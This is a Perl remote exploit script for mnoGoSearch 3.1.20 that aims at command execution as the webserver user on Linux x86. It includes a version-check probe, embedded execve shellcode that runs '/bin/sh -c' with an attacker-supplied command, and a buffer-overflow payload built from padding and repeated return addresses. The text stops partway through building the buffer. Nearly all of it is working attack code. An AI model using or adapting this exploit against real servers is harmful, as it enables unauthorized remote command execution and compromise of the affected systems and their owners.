#!/usr/bin/perl
#
# [ reloaded ]
# Remote Exploit for mnoGoSearch 3.1.20 that performs
# remote command execution as the webserver user id
# for linux ix86
# by pokleyzz
#
sub connect_to {
#print "[x] Connect to $host on port $port ...\n";
$conn = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => "$host",
PeerPort => "$port",
) or die "[*] Can't connect to $host on port $port ...\n";
$conn-> autoflush(1);
}
sub check_version {
my $result;
connect_to();
print "[x] Check if $host use correct version ...\n";
print $conn "GET $searchpath?tmplt=/test/testing123 HTTP/1.1\nHost: $host\nConnection: Close\n\n";
# capture result
while ($line = <$conn>) {
$result .= $line;
};
close $conn;
if ($result =~ /_test_/){
print "[x] Correct version detected .. possibly vulnerable ...\n";
} else {
print $result;
die "[x] New version or wrong url\n";
}
}
sub exploit {
my $rw = $_[0];
$result = "";
# linux ix86 shellcode rip from phx.c by proton
$shellcode = "\xeb\x3b\x5e\x8d\x5e\x10\x89\x1e\x8d\x7e\x18\x89\x7e\x04\x8d\x7e\x1b\x89\x7e\x08"
."\xb8\x40\x40\x40\x40\x47\x8a\x07\x28\xe0\x75\xf9\x31\xc0\x88\x07\x89\x46\x0c\x88"
."\x46\x17\x88\x46\x1a\x89\xf1\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
."\x80\xe8\xc0\xff\xff\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
."\x41\x41"
."/bin/sh -c echo 'Content-Type: text/hello';echo '';"
."$cmd"
."@";
$strret = int_to_hex($rw);
$ret = string_to_ret($strret);
$envvar = 'B' x (4096 - length($shellcode));
$envvar .= $shellcode;
# generate query string
$buffer = "B" x $suffsize;
$buffer .= "B" x 4800;
$buffer .= $ret x 200;